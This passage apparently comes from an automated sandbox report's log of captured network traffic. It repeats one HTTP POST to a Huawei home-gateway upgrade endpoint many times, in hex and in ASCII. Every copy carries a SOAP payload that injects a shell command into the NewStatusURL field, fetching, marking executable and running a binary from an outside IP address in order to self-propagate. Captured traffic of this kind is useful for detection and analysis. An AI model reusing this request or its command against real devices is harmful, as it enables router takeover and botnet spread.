6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l 